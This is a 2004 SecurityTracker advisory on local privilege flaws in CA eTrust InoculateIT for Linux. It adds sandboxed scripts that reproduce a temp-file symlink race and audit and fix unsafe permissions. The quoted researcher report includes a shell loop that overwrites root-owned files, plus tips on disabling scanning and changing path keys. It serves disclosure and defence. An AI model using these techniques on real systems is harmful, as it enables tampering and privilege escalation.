SecurityTracker.com
SecurityTracker Archives

Category: Application (Security) > InoculateIT
Vendors: CA
CA eTrust InoculateIT Default Linux Permissions May Let Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1008993
SecurityTracker URL:  http://securitytracker.com/id/1008993
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 10 2004
Impact:   Denial of service via local system, Modification of system information, Modification of user information, User access via local system
Exploit Included:  Yes  
Version(s): 6.0
Description:   A vulnerability was reported in CA's eTrust InoculateIT anti-virus software for Linux. A local user may be able to gain elevated privileges on the target system.

l0om of excluded.org reported several flaws caused by the file and directory permissions of the Linux installation.

It is reported that some scripts create temporary files with predictable names in a world-writable directory. A local user can create a symbolic link (symlink) at the expected temporary file name, pointing at a critical file on the system. When the affected script runs, the shell redirection follows the symlink, and the critical file is overwritten with the privileges of the application component.

The 'ino/scripts/inoregupdate' and 'scripts/uniftest' scripts write to files named with the script's process ID (which is easily guessed) under '$CAIGLBL0000/tmp', a directory the report found to be world-writable; 'scripts/unimove' uses the fixed name '/tmp/.unimove.sed'.
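The following shell script is an added example, not code from the advisory or from l0om's report. In a private sandbox it recreates the inoregupdate pattern (a temporary file named with the script's PID in a world-writable, non-sticky directory), shows that a symlink planted at the predictable name redirects the write onto another file, and then shows two fixes: letting mktemp create the file (unpredictable name, created with O_EXCL and mode 0600) and enabling the shell's noclobber option so that '>' refuses a path that already exists. The sandbox layout, the stand-in 'critical' file and the 'netstat output' payload are constructed for the demo; the attacker side "guesses" the PID exactly, which a real attacker approximates by pre-creating many candidate names.

```shell
#!/bin/sh
# Added example (not from the advisory or l0om's report): reproduces the
# predictable-temp-file symlink race in a sandbox and shows two fixes.
set -eu
umask 022

SANDBOX=$(mktemp -d)
trap 'rm -rf "$SANDBOX"' EXIT

# Stand-in for $CAIGLBL0000/tmp: world-writable and not sticky, as the
# report observed. (Assumed layout, constructed for the demo.)
SCRATCH="$SANDBOX/tmp"
mkdir -m 0777 "$SCRATCH"

# Stand-in for a critical file the script's invoker can write (constructed).
TARGET="$SANDBOX/critical.conf"

reset_target() {
    printf 'keep_me=1\n' > "$TARGET"
    rm -f "$SCRATCH"/.inoreg.ns.*
}

target_intact() {
    [ "$(cat "$TARGET")" = "keep_me=1" ]
}

# Attacker step: pre-create a symlink at the name the script will use.
# Here the PID is "guessed" exactly; a real attacker sprays many names.
plant_symlink() {
    ln -s "$TARGET" "$SCRATCH/.inoreg.ns.$$"
}

# Vulnerable pattern, mirroring inoregupdate:
#   tfn=$CAIGLBL0000/tmp/.inoreg.ns.$$ ; $NETSTAT -i ... > $tfn
# The redirection follows the planted symlink and clobbers TARGET.
vulnerable_writer() {
    tfn="$SCRATCH/.inoreg.ns.$$"
    printf 'netstat output\n' > "$tfn"
    rm -f "$tfn"
}

# Fix 1: let mktemp pick an unpredictable name and create the file itself
# with O_CREAT|O_EXCL and mode 0600, so nothing pre-planted is followed.
mktemp_writer() {
    tfn=$(mktemp "$SCRATCH/.inoreg.ns.XXXXXX")
    printf 'netstat output\n' > "$tfn"
    rm -f "$tfn"
}

# Fix 2 (defence in depth for fixed names): with noclobber set, '>' refuses
# a path that already exists, including a symlink to an existing file.
noclobber_writer() {
    ( set -C; printf 'netstat output\n' > "$SCRATCH/.inoreg.ns.$$" ) 2>/dev/null
}

# Each scenario returns 0 when it behaves as described in its comment.
run_vulnerable() {           # attack succeeds: TARGET is overwritten
    reset_target; plant_symlink; vulnerable_writer
    ! target_intact
}
run_mktemp() {               # attack fails: TARGET untouched
    reset_target; plant_symlink; mktemp_writer
    target_intact
}
run_noclobber() {            # write refused and TARGET untouched
    reset_target; plant_symlink
    if noclobber_writer; then return 1; fi
    target_intact
}

if run_vulnerable; then echo "vulnerable pattern: $TARGET clobbered via symlink"; fi
if run_mktemp;     then echo "mktemp pattern:     target intact"; fi
if run_noclobber;  then echo "noclobber pattern:  write refused, target intact"; fi
```

The sandbox directory is deliberately non-sticky: the kernel's fs.protected_symlinks restriction only applies to sticky world-writable directories, so a non-sticky product tmp directory like the one in the report gets no help from it. The mktemp fix is the one to prefer; noclobber is a cheap extra guard for scripts that must keep a fixed file name.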

It is also reported that some directories under the product's 'tmp' directory are world-writable without the sticky bit set. Because the directory's permissions, not the file's, govern unlinking and renaming, a local user can delete or replace files in those directories even when the files themselves are root-owned with mode 0600. The '.file', '.nob_event', '.nob_mutex', '.nob_sem', '.sem', and '.shm' directories under 'tmp/.caipcs' are affected, according to the report.

It is also reported that the files in the 'registry' tree are world-writable. A local user can therefore change potentially sensitive values in the registry. For example, a local user can edit 'registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/specified_list' to change the list of file extensions that the anti-virus scanner checks; the report also notes world-writable keys under 'windows/currentversion' that hold paths to system binaries.
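The audit script below is an added example, not from the advisory or the report; it covers both the non-sticky directories and the world-writable registry files described above. It builds a small constructed stand-in for the eTrust install tree, uses find to list world-writable directories that lack the sticky bit and world-writable files (the report's own `find ./ -type f -perm -2` check, extended to directories), and applies a remediation: add the sticky bit to the directories so other users can no longer unlink or rename root-owned entries, and remove 'other' write permission on the files. The directory and file names are assumptions modelled on the report's listings; on a real system point the audit functions at $CAIGLBL0000 instead of the constructed tree.

```shell
#!/bin/sh
# Added example (not from the advisory or the report): audit an install
# tree for world-writable non-sticky directories and world-writable files,
# then apply a remediation. The tree is a constructed stand-in for the
# eTrust layout; point audit_* at $CAIGLBL0000 on a real system.
set -eu
umask 022

ROOT=$(mktemp -d)
trap 'rm -rf "$ROOT"' EXIT

# Build a small tree modelled on the report's listings (names assumed).
build_demo_tree() {
    t=$(mktemp -d "$ROOT/tree.XXXXXX")
    mkdir -p "$t/tmp/.caipcs/.sem" "$t/tmp/.caipcs/.shm" \
             "$t/registry/hkey_current_user/local_scanner"
    chmod 0777 "$t/tmp" "$t/tmp/.caipcs" "$t/tmp/.caipcs/.sem"   # no sticky bit
    chmod 1777 "$t/tmp/.caipcs/.shm"                              # sticky bit set
    printf '3571729\n' > "$t/tmp/.caipcs/.sem/3571729"
    chmod 0600 "$t/tmp/.caipcs/.sem/3571729"   # file mode does not protect it
    printf '|COM|DLL|EXE|\n' > "$t/registry/hkey_current_user/local_scanner/specified_list"
    chmod 0666 "$t/registry/hkey_current_user/local_scanner/specified_list"
    printf '/usr/bin\n' > "$t/registry/hkey_current_user/local_scanner/readonly_key"
    chmod 0644 "$t/registry/hkey_current_user/local_scanner/readonly_key"
    echo "$t"
}

# Directories writable by 'other' without the sticky bit: any user may
# unlink or rename their entries whatever the entries' own modes say.
audit_dirs() { find "$1" -type d -perm -0002 ! -perm -1000 | sort; }

# Files writable by 'other': any user may change their contents
# (the report's  find ./ -type f -perm -2  check).
audit_files() { find "$1" -type f -perm -0002 | sort; }

audit_dir_count()  { audit_dirs "$1"  | wc -l | tr -d ' '; }
audit_file_count() { audit_files "$1" | wc -l | tr -d ' '; }

# Remediation: sticky bit on the directories (they stay usable for file
# creation, but other users can no longer delete root-owned entries) and
# no 'other' write on the files. Use chmod o-w on the directories as well
# if no unprivileged component needs to create files there.
harden_tree() {
    find "$1" -type d -perm -0002 ! -perm -1000 -exec chmod +t {} +
    find "$1" -type f -perm -0002 -exec chmod o-w {} +
}

tree=$(build_demo_tree)
echo "before:"; audit_dirs "$tree"; audit_files "$tree"
harden_tree "$tree"
echo "after: $(audit_dir_count "$tree") unsafe dirs, $(audit_file_count "$tree") unsafe files"
```

Run against a real install as `audit_dirs "$CAIGLBL0000"; audit_files "$CAIGLBL0000"` before changing anything; the world-writable temp directory used by the scripts in the first finding will show up in the directory list as well.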

Impact:   A local user may be able to overwrite critical files on the system to change the operation of the product or potentially gain elevated privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  support.ca.com/inocitsupp.html
Cause:   Access control error, State error
Underlying OS:  Linux (Any)

Message History:   None.


 Source Message Contents

Subject:  [local problems] eTrust Virus Protection 6.0 InoculateIT for linux

author: l0om  <l0om@excluded.org>
software: eTrust Virus Protection 6.0 InoculateIT for linux
 
local phun with etrust antivirus 6.0 inoculateIT linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
eTrust InoculateIT 6.0 comes for the following OSes:
-windows 95/98/ME
-windows nt 4.0/2000
-novell netware 3.x 4.x 5.x
-lotus notes/domino
-microsoft exchange server
-and finally linux (SuSE, RedHat, Caldera, Turbo Linux)

eTrust is an antivirus program which can scan nearly every file format
for viruses. i have installed the version for linux on my SuSE 9.0 system
and noticed the following security flaws:
 
 
1) possible symlink attacks in some scripts

  by the way- the env variable $CAIGLBL0000 can be /usr/local/eTrust/ for example.
  however - the $CAIGLBL0000/tmp IS world writable...
 
ino/scripts/inoregupdate 
######################## 
[...] 
tfn=$CAIGLBL0000/tmp/.inoreg.ns.$$ 
$NETSTAT -i 2>/dev/null | grep -v localhost > $tfn 
[...] 
 
 
scripts/uniftest 
################ 
local=$CAIGLBL0000/tmp 
local1=$CAIGLBL0000/scripts 
[...] 
    $CAIGLBL0000/bin/unips > $local/unips.$$ 
    awk -f $local1/uniftest.awk $local/unips.$$ 
    st_rc=$? 
    rm $local/unips.$$ 
[...] 
 
scripts/unimove 
############### 
           sed -e "s!$from!$to!g" $fn > /tmp/.unimove.sed   #<-- creates it now
           diff $fn /tmp/.unimove.sed > /dev/null
           if [ $? != 0 -a -s /tmp/.unimove.sed ]; then
                mv /tmp/.unimove.sed  $fn
           rm /tmp/.unimove.sed    # deletes it if finished
 
 
2) some directories in /tmp don't have the sticky bit set
an example:
 
eTrustAE.lnx/tmp/.caipcs/ # ls -l
drwxrwxrwx    8 root     root          240 2004-02-05 09:58 .
drwxrwxrwx    4 root     root          160 2004-02-09 16:53 ..
drwxrwxrwx    2 root     root           48 2004-02-05 09:54 .file
-rw-r--r--    1 root     root         4110 2004-02-05 09:58 ipcrm.log
drwxrwxrwx    2 root     root          856 2004-02-05 10:48 .nob_event
drwxrwxrwx    2 root     root         1168 2004-02-05 10:48 .nob_mutex
drwxrwxrwx    2 root     root           48 2004-02-05 09:54 .nob_sem
drwxrwxrwx    2 root     root          384 2004-02-05 10:48 .sem
drwxrwxrwx    2 root     root           80 2004-02-05 10:48 .shm
 
eTrustAE.lnx/tmp/.caipcs # ls -l .sem
drwxrwxrwx    2 root     root          384 2004-02-05 10:48 .
drwxrwxrwx    8 root     root          240 2004-02-05 09:58 ..
-rw-------    1 root     root           20 2004-02-05 10:01 3571729
-rw-------    1 root     root            5 2004-02-05 09:58 3702805
-rw-------    1 root     root           25 2004-02-05 10:01 3735574
-rw-------    1 root     root           25 2004-02-05 10:01 3768343
-rw-------    1 root     root           15 2004-02-05 09:58 3801112
 
this directory includes values which are kinda sensitive. so only root can
read or write them, as we can see from these file permissions.
but the upper directory /.sem has no sticky bit set and is world writeable,
so we can simply overwrite these files, as the directory permissions have a
higher priority than the file permissions. this is the truth for a handful of
directories.
for example:
 
badass~:> phun()
{
    for i in `ls /usr/local/eTrustAE.lnx/tmp/.caipcs/.sem`; do
        cp -f ~/myblankass.ascii /usr/local/eTrustAE.lnx/tmp/.caipcs/.sem/$i
    done
    echo jupp
}
badass~:> phun
jupp
badass~:>
 
 
3) world writeable

with the linux version of etrust there come some directories which we all know- the
"registry". it seems like the whole registry key is world writeable:
 
>find ./ -type f -perm -2 -print
./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/macro_cure_action
./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/scan_files
./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/log_infected_files
./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/specified_list
./registry/hkey_local_machine/software/computerassociates/scanengine/path/home
./registry/hkey_local_machine/software/computerassociates/scanengine/path/logs
[...]
 
they got the sticky bit set, therefore we cannot overwrite or delete them, but sometimes we can
change sensitive values in the registry. for example:
 
cat ./registry/hkey_current_user/software/computerassociates/inoculateit/6.0/local_scanner/specified_list
|COM|DLL|DOT|DOC|EXE|SYS|VXD|XLA|XLS|XLT|XLW|RTF|WIZ|386|ADT|BIN|CBT|CLA|CPL|CSC|DRV|HTM|HTT|JS|MDB|MSO|POT|PPT|SCR|SHS|VBS|VSD|VST|VSS|OCX|HLP|CHM|MSI|VBE|JSE|PIF|BAT|
 
this key contains a list of file endings which specifies what files should be scanned for a virus.
a normal user can simply delete all values except one from this list, and can make the scanner pretty
lame...
furthermore there are world-writable keys like "windows/currentversion", with keys which include the path to
the normal binaries ("/usr/bin"). it may be possible to execute whatever you want on a reboot if you change
the right keys in the right way.
 
 
 
have phun! 
	feel phree! 
		life phat! 
 
YaCP - (Y)ast (a)nother (C)yber(P)unk 
 
--l0om 
--www.excluded.org

Copyright 2021, SecurityGlobal.net LLC